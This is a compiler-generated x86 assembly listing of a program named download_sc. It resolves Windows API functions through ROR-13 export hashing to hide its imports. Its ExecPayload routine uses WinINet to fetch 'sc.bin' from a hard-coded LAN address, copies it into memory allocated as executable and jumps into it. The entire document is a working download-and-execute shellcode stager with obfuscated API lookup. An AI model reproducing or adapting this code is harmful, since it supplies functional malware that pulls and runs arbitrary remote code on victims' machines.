; Listing generated by Microsoft (R) Optimizing Compiler Version 18.00.21005.1 

	TITLE	C:\Users\sickness\Documents\Visual Studio 2013\Projects\download_sc\download_sc\download_sc.c
	.686P
	.XMM
	include listing.inc
	.model	flat

INCLUDELIB OLDNAMES

PUBLIC	_ExecPayload
PUBLIC	_GetProcAddressByHash
; Function compile flags: /Ogspy
;	COMDAT _GetProcAddressByHash
_TEXT	SEGMENT
_dwExportDirRVA$1$ = -16				; size = 4
_dwNumFunctions$1$ = -12				; size = 4
_BaseDllName$1$ = -12					; size = 4
_dwModuleFunctionHash$1$ = -8				; size = 4
_pdwFunctionNameBase$1$ = -4				; size = 4
_GetProcAddressByHash PROC				; COMDAT
; _dwModuleFunctionHash$ = ecx
; File c:\users\sickness\documents\visual studio 2013\projects\download_sc\download_sc\getprocaddressbyhash.h
; Line 32
	sub	esp, 16					; 00000010H
; Line 59
	mov	eax, DWORD PTR fs:48
	push	ebx
	push	ebp
	push	esi
; Line 64
	mov	eax, DWORD PTR [eax+12]
	push	edi
	mov	DWORD PTR _dwModuleFunctionHash$1$[esp+32], ecx
	mov	esi, DWORD PTR [eax+12]
; Line 66
	jmp	$LN5@GetProcAdd
$LL15@GetProcAdd:
; Line 70
	mov	eax, DWORD PTR [esi+48]
	xor	ecx, ecx
	mov	ebx, DWORD PTR [esi+44]
; Line 75
	mov	esi, DWORD PTR [esi]
	mov	DWORD PTR _BaseDllName$1$[esp+32], eax
	mov	eax, DWORD PTR [edx+60]
	mov	ebp, DWORD PTR [eax+edx+120]
	mov	DWORD PTR _dwExportDirRVA$1$[esp+32], ebp
; Line 78
	test	ebp, ebp
	je	SHORT $LN5@GetProcAdd
; Line 84
	shr	ebx, 16					; 00000010H
	xor	edi, edi
	test	ebx, ebx
	je	SHORT $LN10@GetProcAdd
	mov	ebp, DWORD PTR _BaseDllName$1$[esp+32]
$LL12@GetProcAdd:
; Line 90
	mov	al, BYTE PTR [edi+ebp]
	ror	ecx, 13					; 0000000dH
	cmp	al, 97					; 00000061H
; Line 92
	movsx	eax, al
	jl	SHORT $LN9@GetProcAdd
	add	ecx, -32				; ffffffe0H
$LN9@GetProcAdd:
; Line 96
	add	ecx, eax
	inc	edi
	cmp	edi, ebx
	jb	SHORT $LL12@GetProcAdd
	mov	ebp, DWORD PTR _dwExportDirRVA$1$[esp+32]
$LN10@GetProcAdd:
; Line 103
	mov	eax, DWORD PTR [edx+ebp+32]
; Line 105
	xor	ebx, ebx
	mov	edi, DWORD PTR [edx+ebp+24]
	add	eax, edx
	mov	DWORD PTR _dwNumFunctions$1$[esp+32], edi
	test	edi, edi
	je	SHORT $LN5@GetProcAdd
$LL7@GetProcAdd:
; Line 108
	mov	ebp, DWORD PTR [eax]
	xor	edi, edi
	add	ebp, edx
; Line 109
	add	eax, 4
	mov	DWORD PTR _pdwFunctionNameBase$1$[esp+32], eax
$LL4@GetProcAdd:
; Line 116
	movsx	eax, BYTE PTR [ebp]
	ror	edi, 13					; 0000000dH
	add	edi, eax
; Line 117
	inc	ebp
; Line 118
	cmp	BYTE PTR [ebp-1], 0
	jne	SHORT $LL4@GetProcAdd
; Line 120
	lea	eax, DWORD PTR [edi+ecx]
; Line 122
	cmp	eax, DWORD PTR _dwModuleFunctionHash$1$[esp+32]
	je	SHORT $LN23@GetProcAdd
; Line 105
	mov	eax, DWORD PTR _pdwFunctionNameBase$1$[esp+32]
	inc	ebx
	cmp	ebx, DWORD PTR _dwNumFunctions$1$[esp+32]
	jb	SHORT $LL7@GetProcAdd
$LN5@GetProcAdd:
; Line 66
	mov	edx, DWORD PTR [esi+24]
	test	edx, edx
	jne	$LL15@GetProcAdd
; Line 131
	xor	eax, eax
$LN16@GetProcAdd:
; Line 132
	pop	edi
	pop	esi
	pop	ebp
	pop	ebx
	add	esp, 16					; 00000010H
	ret	0
$LN23@GetProcAdd:
; Line 124
	mov	esi, DWORD PTR _dwExportDirRVA$1$[esp+32]
	mov	eax, DWORD PTR [esi+edx+36]
	lea	eax, DWORD PTR [eax+ebx*2]
; Line 125
	movzx	ecx, WORD PTR [eax+edx]
	mov	eax, DWORD PTR [esi+edx+28]
	lea	eax, DWORD PTR [eax+ecx*4]
	mov	eax, DWORD PTR [eax+edx]
	add	eax, edx
	jmp	SHORT $LN16@GetProcAdd
_GetProcAddressByHash ENDP
_TEXT	ENDS
; Function compile flags: /Ogspy
;	COMDAT _ExecPayload
_TEXT	SEGMENT
_dwFlags$ = -68						; size = 4
_MyHttpSendRequestA$1$ = -64				; size = 4
_MyVirtualAlloc$1$ = -60				; size = 4
_MyInternetReadFile$1$ = -56				; size = 4
_bytesRead$ = -52					; size = 4
_payload$ = -48						; size = 7
_http$ = -40						; size = 9
_wininet$ = -28						; size = 12
_hostname$ = -16					; size = 15
_ExecPayload PROC					; COMDAT
; File c:\users\sickness\documents\visual studio 2013\projects\download_sc\download_sc\download_sc.c
; Line 81
	push	ebp
	mov	ebp, esp
	and	esp, -8					; fffffff8H
	sub	esp, 72					; 00000048H
	push	ebx
; Line 83
	xor	eax, eax
	mov	DWORD PTR _wininet$[esp+76], 1768843639	; 696e6977H
	push	ebp
	push	esi
; Line 84
	mov	BYTE PTR _hostname$[esp+98], al
; Line 97
	mov	ecx, 119961420				; 0726774cH
	mov	BYTE PTR _payload$[esp+90], al
	mov	BYTE PTR _http$[esp+92], al
; Line 98
	lea	eax, DWORD PTR _wininet$[esp+84]
	push	edi
	push	eax
	mov	DWORD PTR _wininet$[esp+96], 779380078	; 2e74656eH
	mov	DWORD PTR _wininet$[esp+100], 7105636	; 006c6c64H
	mov	DWORD PTR _hostname$[esp+92], 775043377	; 2e323931H
	mov	DWORD PTR _hostname$[esp+96], 775435825	; 2e383631H
	mov	DWORD PTR _hostname$[esp+100], 825111348 ; 312e3334H
	mov	WORD PTR _hostname$[esp+104], 12339	; 00003033H
	mov	DWORD PTR _payload$[esp+92], 1647207283	; 622e6373H
	mov	WORD PTR _payload$[esp+96], 28265	; 00006e69H
	mov	DWORD PTR _http$[esp+92], 1347703880	; 50545448H
	mov	DWORD PTR _http$[esp+96], 825110831	; 312e312fH
	call	_GetProcAddressByHash
	call	eax
; Line 100
	mov	ecx, -1485220294			; a779563aH
	call	_GetProcAddressByHash
; Line 101
	mov	ecx, -962623145				; c69f8957H
	mov	esi, eax
	call	_GetProcAddressByHash
; Line 102
	mov	ecx, 992892395				; 3b2e55ebH
	mov	edi, eax
	call	_GetProcAddressByHash
; Line 103
	mov	ecx, -2036447627			; 869e4675H
	mov	ebx, eax
	call	_GetProcAddressByHash
; Line 104
	mov	ecx, 2065172013				; 7b18062dH
	mov	ebp, eax
	call	_GetProcAddressByHash
; Line 105
	mov	ecx, -494299630				; e2899612H
	mov	DWORD PTR _MyHttpSendRequestA$1$[esp+88], eax
	call	_GetProcAddressByHash
; Line 106
	mov	ecx, -447503272				; e553a458H
	mov	DWORD PTR _MyInternetReadFile$1$[esp+88], eax
	call	_GetProcAddressByHash
	mov	DWORD PTR _MyVirtualAlloc$1$[esp+88], eax
; Line 116
	xor	eax, eax
	push	eax
	push	eax
	push	eax
	push	eax
	push	eax
	mov	DWORD PTR _dwFlags$[esp+108], 13184	; 00003380H
	call	esi
; Line 117
	xor	esi, esi
	lea	ecx, DWORD PTR _hostname$[esp+88]
	push	esi
	push	-2147483648				; 80000000H
	push	3
	push	esi
	push	esi
	push	80					; 00000050H
	push	ecx
	push	eax
	call	edi
; Line 118
	push	esi
	push	-1610612736				; a0000000H
	push	esi
	push	esi
	lea	ecx, DWORD PTR _http$[esp+104]
	push	ecx
	lea	ecx, DWORD PTR _payload$[esp+108]
	push	ecx
	push	esi
	push	eax
	call	ebx
	mov	edi, eax
; Line 119
	lea	eax, DWORD PTR _dwFlags$[esp+88]
	push	4
	push	eax
	push	31					; 0000001fH
	push	edi
	call	ebp
; Line 120
	push	esi
	push	esi
	push	esi
	push	esi
	push	edi
	call	DWORD PTR _MyHttpSendRequestA$1$[esp+108]
; Line 122
	push	64					; 00000040H
	push	4096					; 00001000H
	mov	ebx, 20480				; 00005000H
	push	ebx
	push	esi
	call	DWORD PTR _MyVirtualAlloc$1$[esp+104]
	mov	esi, eax
; Line 123
	lea	eax, DWORD PTR _bytesRead$[esp+88]
	push	eax
	push	ebx
	push	esi
	push	edi
	call	DWORD PTR _MyInternetReadFile$1$[esp+104]
; Line 125
	call	esi
; Line 127
	pop	edi
	pop	esi
	pop	ebp
	pop	ebx
	mov	esp, ebp
	pop	ebp
	ret	0
_ExecPayload ENDP
_TEXT	ENDS
END
